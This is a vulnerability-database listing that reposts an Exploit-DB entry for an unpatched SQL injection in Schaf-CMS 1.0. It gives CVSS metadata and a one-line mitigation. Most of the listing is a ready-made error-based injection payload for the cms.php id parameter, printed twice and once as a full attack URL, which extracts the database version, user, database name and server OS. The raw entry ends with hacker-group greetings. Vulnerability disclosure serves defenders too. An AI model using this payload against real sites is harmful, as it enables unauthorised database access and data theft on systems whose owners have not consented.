Schaf-CMS 1.0 SQL Injection Vulnerability

vendor:

Schaf-CMS

by:

Manas58

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Schaf-CMS

Affected Version From: Schaf-CMS 1.0

Affected Version To: Schaf-CMS 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:schaf-cms:schaf-cms:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2020

Schaf-CMS 1.0 SQL Injection Vulnerability

Schaf-CMS 1.0 is vulnerable to SQL Injection. The vulnerable file is cms.php?id= [SQL]. An example exploit is +or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+

Mitigation:

Input validation and sanitization should be used to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

Schaf-CMS 1.0 SQL Injection  Vulnerability   
      
###########################  
      
Author    : Manas58   
Homepage  : http://www.1923turk.com      
Script    : Schaf-CMS 1.0  
Download  : http://www.brothersoft.com/site-builder-software---cms-53489.html 
      
###########################    
        
[ Vulnerable File ]  
    
cms.php?id= [ SQL ]  
         
    
[ XpL ]  
      
+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+
    
    
http://server/cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+      
  
 
  
       
##############################################################    
# Greetz: Gamoscu - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO    
##############################################################